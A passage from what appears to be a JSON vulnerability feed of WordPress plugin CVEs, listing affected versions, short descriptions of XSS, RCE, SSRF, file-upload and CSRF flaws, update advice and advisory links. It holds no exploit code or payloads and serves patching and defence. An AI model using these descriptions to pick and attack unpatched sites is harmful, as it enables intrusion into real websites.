version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207590\\\/broken-link-finder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207590\\\/broken-link-finder\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13673","slug":"big-boom-directory","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Big Boom Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bbd-search' shortcode in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258281%40big-boom-directory&new=3258281%40big-boom-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258281%40big-boom-directory&new=3258281%40big-boom-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262078%40big-boom-directory&new=3262078%40big-boom-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262078%40big-boom-directory&new=3262078%40big-boom-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5284cbe4-1550-4f3c-be54-e2de8a089512?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5284cbe4-1550-4f3c-be54-e2de8a089512?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3105","slug":"insert-php","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Woody code snippets \u2013 Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/134ad095-b0a0-4f0f-832d-3e558d4a250a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/134ad095-b0a0-4f0f-832d-3e558d4a250a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/class.plugin.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/class.plugin.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/shortcodes\\\/shortcode-insert-php.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/shortcodes\\\/shortcode-insert-php.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3102522%40insert-php&new=3102522%40insert-php&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3102522%40insert-php&new=3102522%40insert-php&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3742","slug":"responsive-lightbox","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Responsive Lightbox & Gallery WordPress plugin before 2.5.1 does not validate and escape some of its attributes before outputting them back in a page\/post, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b8f487b-63a5-4d2a-9b61-ed4d97f18320\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b8f487b-63a5-4d2a-9b61-ed4d97f18320\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10814","slug":"simple-embed-code","versionImpact":"2.5","versionEndExcluding":"2.5.1","description":"The Code Embed plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5 via the ce_get_file() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1e17c9-b9ee-495a-be49-9aa88f8023a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1e17c9-b9ee-495a-be49-9aa88f8023a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-embed-code\\\/trunk\\\/includes\\\/add-embeds.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-embed-code\\\/trunk\\\/includes\\\/add-embeds.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182609\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182609\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6206","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Aiomatic - Automatic AI Content Writer & Editor, GPT-3 & GPT-4, ChatGPT ChatBot & AI Toolkit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aiomatic_image_editor_ajax_submit' function in all versions up to, and including, 2.5.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. In order to exploit the vulnerability, there must be a value entered for the Stability.AI API key. The value can be arbitrary.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369#item-description__changelog\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e0ff2d6-65d2-4a54-b3e5-64b424013313?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e0ff2d6-65d2-4a54-b3e5-64b424013313?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5162","slug":"options-for-twenty-seventeen","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Options for Twenty Seventeen plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'social-links' shortcode in versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df35d8c6-55ec-4cf5-8055-93ec5193c0a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df35d8c6-55ec-4cf5-8055-93ec5193c0a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/options-for-twenty-seventeen\\\/tags\\\/2.5.0\\\/options-for-twenty-seventeen.php#L3110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/options-for-twenty-seventeen\\\/tags\\\/2.5.0\\\/options-for-twenty-seventeen.php#L3110\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971104\\\/options-for-twenty-seventeen\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971104\\\/options-for-twenty-seventeen\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5006","slug":"wp-discord-invite","versionEndExcluding":"2.5.1","description":"The WP Discord Invite WordPress plugin before 2.5.1 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator to submit a crafted request.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d29bcc1c-241b-4867-a0c8-4ae5f9d1c8e8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d29bcc1c-241b-4867-a0c8-4ae5f9d1c8e8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41241","slug":"surecart","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in SureCart WordPress Ecommerce For Creating Fast Online Stores plugin <=\u00a02.5.0 versions.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surecart\\\/wordpress-surecart-plugin-2-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surecart\\\/wordpress-surecart-plugin-2-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6451","slug":"ai-engine","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"AI Engine < 2.4.3 is susceptible to remote-code-execution (RCE) via Log Poisoning. The AI Engine WordPress plugin before 2.5.1 fails to validate the file extension of \"logs_path\", allowing Administrators to change log filetypes from .log to .php.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc06d413-a227-470c-a5b7-cdab57aeab34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc06d413-a227-470c-a5b7-cdab57aeab34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3990","slug":"ht-mega-for-elementor","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tooltip & Popover Widget in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98e74a23-b586-4d6a-b1ab-78838b0eed61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98e74a23-b586-4d6a-b1ab-78838b0eed61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_tooltip.php#L620\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_tooltip.php#L620\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12495","slug":"wp-editor-bootstrap-blocks","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Bootstrap Blocks for WP Editor v2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gtb-bootstrap\/column' block in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213432%40wp-editor-bootstrap-blocks&new=3213432%40wp-editor-bootstrap-blocks&sfp_email=&sfph_mail=#file33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213432%40wp-editor-bootstrap-blocks&new=3213432%40wp-editor-bootstrap-blocks&sfp_email=&sfph_mail=#file33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e9e9afc-89a0-444d-ad5b-975e0f3c19d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e9e9afc-89a0-444d-ad5b-975e0f3c19d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3989","slug":"ht-mega-for-elementor","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Gallery Justify Widget in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03fba6bb-ff30-42bb-936b-93c009a7e3f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03fba6bb-ff30-42bb-936b-93c009a7e3f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2286","slug":"sky-elementor-addons","versionImpact":"2.4.0","versionEndExcluding":"2.5.0","description":"The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link URL value in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2821","slug":"search-exclude","versionImpact":"2.4.9","versionEndExcluding":"2.5.0","description":"The Search Exclude plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_rest_permission function in all versions up to, and including, 2.4.9. This makes it possible for unauthenticated attackers to modify plugin settings, excluding content from search results.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-exclude\\\/tags\\\/2.4.6\\\/lib\\\/api\\\/entities\\\/settings\\\/class-post.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-exclude\\\/tags\\\/2.4.6\\\/lib\\\/api\\\/entities\\\/settings\\\/class-post.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284798\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284798\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f72a309-8ef8-4943-8e64-38bb7909397a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f72a309-8ef8-4943-8e64-38bb7909397a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3312","slug":"easy-custom-auto-excerpt","versionImpact":"2.4.12","versionEndExcluding":"2.5.0","description":"The Easy Custom Auto Excerpt plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.12. This makes it possible for unauthenticated attackers to obtain excerpts of password-protected posts.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c1e1fe4-23be-4f66-ae9f-cabb83811b71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c1e1fe4-23be-4f66-ae9f-cabb83811b71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071273%40easy-custom-auto-excerpt%2Ftrunk&old=2242878%40easy-custom-auto-excerpt%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071273%40easy-custom-auto-excerpt%2Ftrunk&old=2242878%40easy-custom-auto-excerpt%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3308","slug":"ht-mega-for-elementor","versionImpact":"2.4.9","versionEndExcluding":"2.5.0","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Grid widget's attributes in all versions up to, and including, 2.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33b5e231-1b53-4646-ae9c-48babf1ebbd7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33b5e231-1b53-4646-ae9c-48babf1ebbd7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3307","slug":"ht-mega-for-elementor","versionImpact":"2.4.9","versionEndExcluding":"2.5.0","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown widget's attributes in all versions up to, and including, 2.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8452e54-7a81-4921-b531-8cb3b0953dab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8452e54-7a81-4921-b531-8cb3b0953dab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_countdown.php#L1251\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_countdown.php#L1251\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3999","slug":"eazydocs","versionImpact":"2.4.1","versionEndExcluding":"2.5.0","description":"The EazyDocs  WordPress plugin before 2.5.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a8a1deb-6836-40f1-856b-7b3e4ba867d6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a8a1deb-6836-40f1-856b-7b3e4ba867d6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-32499","slug":"radio-station","versionEndExcluding":"2.5.0","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Tony Zeoli, Tony Hayes Radio Station by netmix\u00ae \u2013 Manage and play your Show Schedule in WordPress! plugin <=\u00a02.4.0.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/radio-station\\\/wordpress-radio-station-plugin-2-4-0-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/radio-station\\\/wordpress-radio-station-plugin-2-4-0-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9756","slug":"order-attachments-for-woocommerce","versionImpact":"2.4.1","versionEndExcluding":"2.5.0","description":"The Order Attachments for WooCommerce plugin for WordPress is vulnerable to unauthorized limited arbitrary file uploads due to a missing capability check on the wcoa_add_attachment AJAX action in versions 2.0 to 2.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload limited file types.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfc8957-78b8-4c55-ba95-52d95b086341?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfc8957-78b8-4c55-ba95-52d95b086341?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167136%40order-attachments-for-woocommerce&new=3167136%40order-attachments-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167136%40order-attachments-for-woocommerce&new=3167136%40order-attachments-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2168","slug":"ultimate-store-kit","versionImpact":"2.4.1","versionEndExcluding":"2.5.0","description":"The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1. This is due to missing or incorrect nonce validation on the dismiss() function. This makes it possible for unauthenticated attackers to set arbitrary user meta values to `1` which can be leveraged to lock an administrator out of their site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.5.0, or a newer patched 